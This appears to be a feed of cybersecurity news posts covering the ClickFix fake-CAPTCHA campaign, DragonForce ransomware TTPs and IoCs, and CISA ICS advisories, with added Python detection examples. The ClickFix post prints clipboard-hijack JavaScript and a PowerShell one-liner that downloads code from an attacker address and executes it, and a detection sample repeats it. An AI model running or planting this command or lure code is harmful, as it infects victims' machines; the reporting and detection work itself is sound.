• A sophisticated cybercrime operation has emerged, targeting unsuspecting internet users through a deceptive social engineering technique that exploits one of the web’s most trusted security mechanisms.

    Since June 2024, the financially motivated threat group UNC5518 has been systematically compromising legitimate websites to inject malicious fake CAPTCHA verification pages, tricking visitors into unknowingly executing malware on their systems.

    The attack campaign, dubbed “ClickFix” by security researchers, represents a particularly insidious form of social engineering that leverages users’ familiarity with routine CAPTCHA challenges. When victims encounter these fraudulent verification pages, they are presented with what appears to be a standard reCAPTCHA interface, complete with the familiar “I’m not a robot” checkbox and Google branding.

    However, clicking on this seemingly innocuous element triggers a malicious JavaScript payload that automatically copies a PowerShell command to the user’s clipboard.

    Google Cloud analysts identified that UNC5518 operates as an access-as-a-service provider, partnering with multiple affiliate threat groups to monetize their initial compromise capabilities.

    The group’s sophisticated infrastructure supports various downstream actors, including UNC5774, which specializes in deploying the CORNFLAKE.V3 backdoor, and UNC4108, known for utilizing PowerShell-based tools and conducting extensive network reconnaissance.

    Attack lifecycle (Source – Google Cloud)

    The technical execution of this attack demonstrates remarkable attention to detail in mimicking legitimate web security practices.

    The malicious JavaScript embedded within compromised websites creates a convincing CAPTCHA interface using code that closely resembles authentic Google reCAPTCHA implementations.

    When victims interact with the fake verification system, the following code executes silently in the background:

    // "j" is the fake "I'm not a robot" checkbox; _0xC (defined elsewhere in the
    // obfuscated script) holds the PowerShell one-liner to be planted on the clipboard
    document.getElementById("j").onclick = function(){
        var ta = document.createElement("textarea");
        ta.value = _0xC;
        document.body.appendChild(ta);
        ta.select();
        document.execCommand("copy"); // silently overwrites the victim's clipboard
    };

    This script automatically copies a carefully crafted PowerShell command to the victim’s clipboard, which appears as: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)%0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex".

    The command is designed to download and execute additional malware payloads from attacker-controlled infrastructure.

    Infection Mechanism and Payload Delivery

    The ClickFix technique exploits a critical weakness in user behavior patterns, capitalizing on the widespread acceptance and trust associated with CAPTCHA systems.

    Once the malicious PowerShell command is copied to the clipboard, victims are typically instructed through on-screen prompts to paste and execute the command using the Windows Run dialog (Windows+R), believing they are completing a legitimate verification process.

    Upon execution, the PowerShell script initiates a sophisticated multi-stage infection chain that includes comprehensive anti-analysis measures.

    The malware performs environment checks to detect virtual machines and sandboxes, examining system memory configurations and manufacturer information to evade security research environments.

    If these checks pass, the script downloads Node.js runtime components from legitimate sources and deploys the CORNFLAKE.V3 backdoor, which establishes persistent access through registry modifications and enables comprehensive system reconnaissance activities including Active Directory enumeration and Kerberoasting credential harvesting techniques.
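    The launch stage described above (a hidden PowerShell window, a remote fetch piped straight into Invoke-Expression, a bare-IP URL, and a parent of explorer.exe because the victim used the Run dialog) is what endpoint detection should key on. The following is an added example, not code from the article or from Google Cloud's report: it scores constructed process-creation events against those traits. The field names (parent_image, image, command_line) follow a generic Sysmon/EDR-style schema and are an assumption, and 203.0.113.10 is a documentation placeholder standing in for the campaign's address.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example; not code from the article or from Google Cloud's report.
Field names (parent_image, image, command_line) follow a generic
Sysmon/EDR-style schema and are an assumption, as are the sample events,
which are constructed here. 203.0.113.10 is a documentation placeholder,
not the address from the campaign.
"""
import re

# Traits of the one-liner quoted in the article: hidden window, a remote
# fetch piped into Invoke-Expression, and a bare-IP URL with a numeric path.
HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b")
REMOTE_FETCH = re.compile(r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b")
INVOKE_EXPR = re.compile(r"(?i)\|\s*(?:iex|invoke-expression)\b")
BARE_IP_URL = re.compile(r"(?:https?://)?\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/\S*")
# The Run dialog (Win+R) is a child of explorer.exe; that parent is the
# tell-tale of a user pasting a command rather than a script or task running it.
RUN_DIALOG_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation event; 0 if not PowerShell."""
    if _basename(event.get("image", "")) not in POWERSHELL_IMAGES:
        return 0, []
    cmd = event.get("command_line", "")
    reasons = []
    if _basename(event.get("parent_image", "")) in RUN_DIALOG_PARENTS:
        reasons.append("launched from explorer.exe (Run dialog)")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window (-w h)")
    if REMOTE_FETCH.search(cmd) and INVOKE_EXPR.search(cmd):
        reasons.append("remote download piped to iex")
    if BARE_IP_URL.search(cmd):
        reasons.append("bare-IP URL")
    return len(reasons), reasons


def find_clickfix(events, threshold=3):
    """Return [(event_id, reasons)] for events scoring at or above threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["id"], reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {  # the ClickFix launch described in the article, with a placeholder IP
        "id": 1,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1')"
                        ".TotalSeconds)%0xfffffffffffffff0;irm 203.0.113.10:8080/$u|iex\"",
    },
    {  # routine admin script started by a scheduled task: no hit
        "id": 2,
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {  # not PowerShell at all: ignored
        "id": 3,
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe",
    },
]

if __name__ == "__main__":
    for event_id, reasons in find_clickfix(SAMPLE_EVENTS):
        print(f"event {event_id}: {'; '.join(reasons)}")
```

    The threshold of three keeps a lone hidden-window flag or a lone explorer.exe parent from paging anyone; the combination of a Run-dialog parent with download-and-iex is what distinguishes a pasted ClickFix lure from legitimate administration.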


    The post UNC5518 Group Hacks Legitimate Websites to Inject Fake Captcha That Tricks Users to Execute Malware appeared first on Cyber Security News.


  • Security researchers have uncovered a critical series of vulnerabilities in Commvault’s backup and data management software that could enable attackers to achieve remote code execution and compromise on-premises infrastructure. The flaws, discovered by Watchtowr Labs, represent a significant threat to organizations relying on Commvault’s widely-deployed backup solutions. The vulnerability chain consists of four distinct security […]

    The post Commvault Backup Suite Flaws Allow Attackers to Breach On-Premises Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • DragonForce represents a sophisticated and rapidly evolving ransomware operation that has emerged as a significant threat in the cybersecurity landscape since late 2023.

    Operating under a Ransomware-as-a-Service (RaaS) model, this group has demonstrated exceptional adaptability by leveraging leaked ransomware builders from notorious families like LockBit 3.0 and Conti to create customized attack variants.

    The organization has successfully targeted high-profile victims across multiple sectors, including government entities, retail giants, and critical infrastructure, with notable attacks against the Ohio Lottery, Palau government, and major UK retailers like Marks & Spencer.

    Their operations combine advanced technical capabilities with professional business practices, offering affiliates up to 80% of ransom payments while providing comprehensive attack infrastructure and support services.

    Ransomware attack flow. (Source: cybersecuritynews.com)

    Introduction to DragonForce Ransomware

    DragonForce first appeared in December 2023 with the launch of their “DragonLeaks” dark web portal, quickly establishing themselves as a formidable player in the ransomware ecosystem.

    The group’s origins trace back to possible connections with DragonForce Malaysia, a hacktivist collective, though the current operation has evolved into a purely profit-driven enterprise.

    By 2025, DragonForce has matured into a sophisticated RaaS platform that attracts both displaced affiliates from dismantled ransomware operations and freelance threat actors seeking robust infrastructure.

    The organization operates two distinct ransomware variants based on leaked source code from established families. Their initial variant utilized the leaked LockBit 3.0 (Black) builder, allowing them to rapidly deploy effective ransomware without developing complex encryption mechanisms from scratch.

    In July 2024, DragonForce introduced a second variant based on the Conti V3 codebase, providing affiliates with enhanced customization capabilities. This dual-variant approach demonstrates the group’s technical sophistication and commitment to providing affiliates with diverse attack options.

    The group’s business model reflects modern cybercrime trends, offering a comprehensive platform that includes attack management tools, automated features, and customizable builders.

    Affiliates can tailor ransomware samples by disabling targeted security features, configuring encryption parameters, and personalizing ransom notes.

    In early 2025, DragonForce expanded its offerings by introducing a white-label ransomware service, enabling affiliates to rebrand payloads under alternative names for additional fees.

    Attack Vectors and Initial Access Techniques

    DragonForce employs multiple sophisticated vectors to achieve initial access to target networks, demonstrating the group’s understanding of diverse organizational vulnerabilities. 

    Phishing campaigns remain a primary attack vector, with operators crafting convincing spear-phishing emails containing malicious attachments or links that deploy ransomware payloads when executed by unsuspecting users.

    These campaigns often target specific individuals within organizations using social engineering techniques to increase success rates.

    Exploitation of known vulnerabilities represents another critical attack vector, with DragonForce operators actively targeting unpatched systems.

    The group has specifically been associated with exploiting several high-impact vulnerabilities, including CVE-2021-44228 (Log4Shell), CVE-2023-46805 (Ivanti Connect Secure Authentication Bypass), CVE-2024-21412 (Microsoft Windows SmartScreen Bypass), CVE-2024-21887 (Ivanti Connect Secure Command Injection), and CVE-2024-21893 (Ivanti Connect Secure Path Traversal).

    DragonForce affiliates systematically target organizations with poorly secured remote access infrastructure, leveraging stolen or weak credentials to establish a persistent network presence.

    The group also exploits trusted relationships, as demonstrated in a recent incident where attackers gained access through remote management software installed by a previous hosting company that was never properly removed.

    In some cases, DragonForce operators have gained initial access by exploiting compromised managed service provider (MSP) relationships, allowing them to move laterally across multiple client environments through trusted connections.

    This technique amplifies the impact of individual breaches by providing access to numerous organizations through a single compromise point.

    Remote Desktop Protocol (RDP) and VPN attacks constitute significant initial access methods, with operators conducting credential stuffing attacks and brute-force operations against exposed services.

    Cyber Kill Chain. (Source: cybersecuritynews.com)

    Tactics, Techniques, and Procedures (TTPs)

    DragonForce’s operational methodology follows the MITRE ATT&CK framework across multiple tactics, demonstrating a sophisticated understanding of enterprise network compromise techniques.

    Tactic | ID | Technique | Description | Ratings (unlabeled in source)
    Initial Access | T1190 | Exploit Public-Facing Application | Exploits CVE-2021-44228 (Log4Shell), CVE-2023-46805, CVE-2024-21412, CVE-2024-21887, CVE-2024-21893 | High / Medium
    Initial Access | T1078 | Valid Accounts | Uses stolen/weak RDP and VPN credentials, brute force attacks on remote access services | High / Low
    Initial Access | T1566.001 | Spearphishing Attachment | Deploys ransomware through malicious email attachments targeting specific individuals | High / Medium
    Initial Access | T1566.003 | Spearphishing via Service | Conducts vishing (voice phishing) campaigns alongside email phishing | Medium / High
    Initial Access | T1199 | Trusted Relationship | Exploits compromised MSP relationships and previous hosting company access | Medium / High
    Execution | T1204.002 | Malicious File | Social engineering users to execute ransomware payloads, moves files to System32 | High / Low
    Execution | T1059.001 | PowerShell | Uses PowerShell for command execution, payload deployment, and system reconnaissance | High / Medium
    Execution | T1053.005 | Scheduled Task/Job | Creates scheduled tasks for persistence and automated execution | Medium / Low
    Persistence | T1574.011 | Services File Permissions Weakness | Installs AnyDesk remote access tool for persistent backdoor access | High / Medium
    Persistence | T1053.005 | Scheduled Task/Job | Establishes scheduled tasks to maintain persistence across reboots | Medium / Low
    Persistence | T1547.001 | Registry Run Keys / Startup Folder | Modifies registry Run keys to ensure malware execution at startup | Medium / Low
    Privilege Escalation | T1134 | Access Token Manipulation | Duplicates SYSTEM-level access tokens using DuplicateTokenEx() API | High / High
    Privilege Escalation | T1068 | Exploitation for Privilege Escalation | Leverages known vulnerabilities for escalation to administrator privileges | Medium / Medium
    Defense Evasion | T1027 | Obfuscated Files or Information | Embeds Chinese text signatures, uses code obfuscation techniques | High / High

    Indicators of Compromise (IoCs)

    Security teams should monitor for specific indicators associated with DragonForce campaigns to enable early detection and response. 

    Network indicators include the command and control server IP addresses 2[.]147[.]68[.]96, 185[.]59[.]221[.]75, and 69[.]4[.]234[.]20. Notably, early campaign infrastructure was identified in Iran, suggesting international collaboration or infrastructure rental.

    IoC Type | Indicator | Description | Threat Level | Detection Method
    IP Address (C&C) | 2.147.68.96 | Command and Control server | High | Network monitoring, firewall logs
    IP Address (C&C) | 185.59.221.75 | Command and Control server | High | Network monitoring, firewall logs
    IP Address (C&C) | 69.4.234.20 | Command and Control server | High | Network monitoring, firewall logs
    File Hash (SHA256) | b9bba02d18bacc4bc8d9e4f70657d381568075590cc9d0e7590327d854224b32 | DragonForce ransomware executable hash | Critical | File integrity monitoring, antivirus
    File Hash (SHA256) | ba1be94550898eedb10eb73cb5383a2d1050e96ec4df8e0bf680d3e76a9e2429 | DragonForce payload hash | Critical | File integrity monitoring, antivirus
    File Hash (SHA256) | d626eb0565fac677fdc13fb0555967dc31e600c74fbbd110b744f8e3a59dd3f9 | DragonForce variant hash | Critical | File integrity monitoring, antivirus
    File Path | C:\Users\Public\Documents\Winupdate.exe | Exfiltration tool location | High | File system monitoring, EDR
    File Path | C:\Windows\System32\Winupdate.exe | Alternative exfiltration tool path | High | File system monitoring, EDR
    File Path | C:\Users\Public\log.log | System information log file | Medium | File system monitoring
    File Path | C:\Windows\System32\ | Common payload deployment directory | Medium | Directory monitoring
    Filename | Winupdate.exe | Data exfiltration utility (GoLang) | High | Process monitoring, EDR
    Filename | FileSeek.exe | File discovery reconnaissance tool | Medium | Process monitoring
    Filename | README.txt | Ransom note filename | Low | File system monitoring
    Filename | SystemBC | SOCKS5 backdoor for persistence | High | Network monitoring, process monitoring
    File Extension | .dragonforce_encrypted | Encrypted file extension | Medium | File system monitoring
    Domain (.onion) | z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion | DragonLeaks leak site | High | Network monitoring, DNS logs
    Domain (.onion) | 3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd.onion | Alternative leak site domain | High | Network monitoring, DNS logs
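    The indicators above are only useful once a SOC runs them against its own telemetry. The following is an added example, not code from the article: it loads the published indicators, re-fangs the bracketed notation used in the prose, normalises case, and matches constructed firewall, EDR and file-system records. The key="value" record layout and the sample records are assumptions made for illustration.

```python
"""Match the DragonForce indicators from the table above against log records.

Added example; not code from the article. Indicator values are the ones the
table publishes. The key="value" log line layout and the sample records are
constructed for illustration.
"""
import re


def refang(indicator):
    """Turn defanged notation (2[.]147[.]68[.]96, hxxp://) back into plain form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


# Indicators from the IoC table, normalised to lower case for comparison.
IOCS = {
    "ip": {refang(i) for i in ("2[.]147[.]68[.]96", "185[.]59[.]221[.]75", "69[.]4[.]234[.]20")},
    "sha256": {
        "b9bba02d18bacc4bc8d9e4f70657d381568075590cc9d0e7590327d854224b32",
        "ba1be94550898eedb10eb73cb5383a2d1050e96ec4df8e0bf680d3e76a9e2429",
        "d626eb0565fac677fdc13fb0555967dc31e600c74fbbd110b744f8e3a59dd3f9",
    },
    "path": {
        r"c:\users\public\documents\winupdate.exe",
        r"c:\windows\system32\winupdate.exe",
        r"c:\users\public\log.log",
    },
    "filename": {"winupdate.exe", "fileseek.exe"},
    "extension": {".dragonforce_encrypted"},
    "onion": {
        "z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion",
        "3pktcrcbmssvrnwe5skburdwe2h3v6ibdnn5kbjqihsg6eu6s6b7ryqd.onion",
    },
}

FIELD = re.compile(r'(\w+)="([^"]*)"')


def parse_record(line):
    """Parse one constructed key="value" log line into a dict."""
    return dict(FIELD.findall(line))


def match_record(rec):
    """Return the (ioc_type, indicator) pairs that hit this record."""
    hits = []
    for key in ("src_ip", "dst_ip"):
        if rec.get(key) in IOCS["ip"]:
            hits.append(("ip", rec[key]))
    digest = rec.get("sha256", "").lower()
    if digest in IOCS["sha256"]:
        hits.append(("sha256", digest))
    path = rec.get("path", "").lower()
    if path:
        if path in IOCS["path"]:
            hits.append(("path", path))
        name = path.rsplit("\\", 1)[-1]
        if name in IOCS["filename"]:
            hits.append(("filename", name))
        for ext in IOCS["extension"]:
            if path.endswith(ext):
                hits.append(("extension", ext))
    host = rec.get("dst_host", "").lower()
    if host in IOCS["onion"]:
        hits.append(("onion", host))
    return hits


def scan(lines):
    """Return {record_id: hits} for every record with at least one match."""
    results = {}
    for line in lines:
        rec = parse_record(line)
        hits = match_record(rec)
        if hits:
            results[rec["id"]] = hits
    return results


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    'id="1" type="fw" src_ip="10.0.0.5" dst_ip="185.59.221.75" dst_port="443"',
    'id="2" type="edr" path="C:\\Users\\Public\\Documents\\Winupdate.exe" '
    'sha256="B9BBA02D18BACC4BC8D9E4F70657D381568075590CC9D0E7590327D854224B32"',
    'id="3" type="fs" path="D:\\Finance\\Q2.xlsx.dragonforce_encrypted"',
    'id="4" type="fw" src_ip="10.0.0.8" dst_ip="8.8.8.8" dst_port="53"',
    'id="5" type="edr" path="C:\\Program Files\\Vendor\\winupdate.exe"',
]

if __name__ == "__main__":
    for rec_id, hits in scan(SAMPLE_LOG).items():
        print(rec_id, hits)
```

    Record 5 shows why the table rates the bare filename lower than the full path or hash: a Winupdate.exe under a vendor directory matches on name alone and needs the hash or the C:\Users\Public path before it is treated as the exfiltration tool.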

    The Marks & Spencer incident in April 2025 caused estimated losses of £300 million and months-long operational disruption, with attackers sending direct emails to the CEO demanding ransom payments.

    These cases illustrate DragonForce’s capability to target both government infrastructure and private sector organizations with devastating effectiveness, emphasizing the critical need for comprehensive cybersecurity measures and incident response planning.


    The post DragonForce Ransomware Attack Analysis – Targets, TTPs and IoCs appeared first on Cyber Security News.


  • The financially motivated threat group UNC5518 has been infiltrating trustworthy websites to install ClickFix lures, which are misleading phony CAPTCHA pages, as part of a complex cyber campaign that has been monitored since June 2024. These malicious pages trick users into executing downloader scripts that initiate infection chains, often leading to malware deployment by affiliated […]

    The post UNC5518 Group Hacks Legitimate Sites with Fake Captcha to Deliver Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that’s being used to deliver via email spam campaigns an array of next-stage payloads ranging from information stealers to remote access trojans since November 2024. Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT,


  • As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing


  • Cybersecurity researchers are highlighting a dangerous attack technique that combines rogue IPv6 configuration with NTLM credential relay to achieve complete Active Directory domain compromise, exploiting default Windows configurations that most organizations leave unchanged. Attack Leverages Default Windows IPv6 Behavior The MITM6 + NTLM Relay attack exploits Windows systems’ automatic DHCPv6 requests, even in networks that […]

    The post MITM6 + NTLM Relay Attack Enables Full Domain Compromise appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • CISA issued four comprehensive Industrial Control Systems (ICS) advisories on August 19, 2025, highlighting serious vulnerabilities affecting critical infrastructure sectors including energy and manufacturing.

    These advisories detail exploitable vulnerabilities with CVSS scores ranging from 5.8 to 9.8, requiring immediate attention from system administrators and security professionals.

    Key Takeaways
    1. CISA issued four ICS advisories for Siemens, Tigo Energy, and EG4 systems affecting critical infrastructure.
    2. Critical vulnerabilities (CVSS up to 9.8) enable remote attacks and system compromise.
    3. Update immediately - Apply vendor patches and implement network segmentation.

    Critical Siemens Vulnerabilities 

    Two significant Siemens advisories were released addressing distinct attack vectors. Advisory ICSA-25-231-01 covers the Desigo CC Product Family and SENTRON Powermanager, identifying a least privilege violation (CWE-272) vulnerability tracked as CVE-2025-47809 with a CVSS v3.1 score of 8.2. 

    This vulnerability affects Wibu CodeMeter components across multiple product versions (V5.0 through V8), enabling privilege escalation through the CodeMeter Control Center component immediately after installation.

    The second Siemens advisory, ICSA-25-231-02, addresses the Mendix SAML Module with a more severe improper verification of cryptographic signature (CWE-347) vulnerability. 

    CVE-2025-40758 carries a CVSS v3.1 score of 8.7 and enables unauthenticated remote attackers to hijack accounts in specific Single Sign-On (SSO) configurations.

    The vulnerability affects multiple Mendix versions, with patches available requiring updates to V3.6.21, V4.0.3, or V4.1.2 depending on the deployment.

    Tigo and EG4 Infrastructure Vulnerabilities

    The energy sector faces particularly severe threats with two advisories targeting solar energy infrastructure. 

    ICSA-25-217-02 addresses Tigo Energy’s Cloud Connect Advanced devices with three critical vulnerabilities: hard-coded credentials (CWE-798), command injection (CWE-77), and predictable PRNG seeds (CWE-337). 

    CVE-2025-7768 received the highest CVSS v4 score of 9.3, while CVE-2025-7769 and CVE-2025-7770 both scored 8.7.

    EG4 Electronics inverters, covered in advisory ICSA-25-219-07, present four distinct vulnerabilities: cleartext transmission (CWE-319), firmware integrity issues (CWE-494), observable discrepancies (CWE-203), and improper restriction of excessive authentication attempts (CWE-307), which leaves the login open to brute forcing. 

    The most critical, CVE-2025-46414, achieved a CVSS v4 score of 9.2, though EG4 deployed server-side fixes for some vulnerabilities in April 2025.

    Mitigations

    Siemens recommends updating CodeMeter to version 8.30a for the Desigo CC and SENTRON products, and enabling the UseEncryption setting in the Mendix SAML module. 

    Tigo Energy is developing comprehensive fixes, while EG4 has implemented server-side patches and plans new hardware releases by October 15, 2025.

    CISA emphasizes implementing defense-in-depth strategies, including network segmentation, VPN-secured remote access, and firewall isolation. 

    Organizations should prioritize impact analysis and risk assessment before deploying defensive measures, while monitoring for suspicious activity and reporting incidents to CISA for correlation analysis. 

    No public exploitation has been reported for these specific vulnerabilities, providing a critical window for remediation efforts.


    The post CISA Releases Four ICS Advisories Surrounding Vulnerabilities, and Exploits appeared first on Cyber Security News.


  • Researchers at Push Security have discovered a new phishing campaign that targets Microsoft 365 (M365) systems and uses Active Directory Federation Services (ADFS) to enable credential theft. This attack vector exploits Microsoft’s authentication redirect mechanisms, effectively turning a legitimate service into a conduit for phishing operations. Sophisticated Phishing Infrastructure The campaign begins with malvertising lures […]

    The post New Campaign Uses Active Directory Federation Services to Steal M365 Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Security researchers at Imperva have disclosed a critical pre-handshake memory exhaustion vulnerability in the widely-used LSQUIC QUIC implementation that enables remote attackers to crash servers through denial-of-service attacks. The flaw, designated CVE-2025-54939 and dubbed “QUIC-LEAK,” bypasses standard QUIC connection-level protections by triggering before any handshake is established, leaving servers vulnerable to unbounded memory growth and […]

    The post QUIC-LEAK Vulnerability Allows Attackers to Drain Server Memory and Cause DoS appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
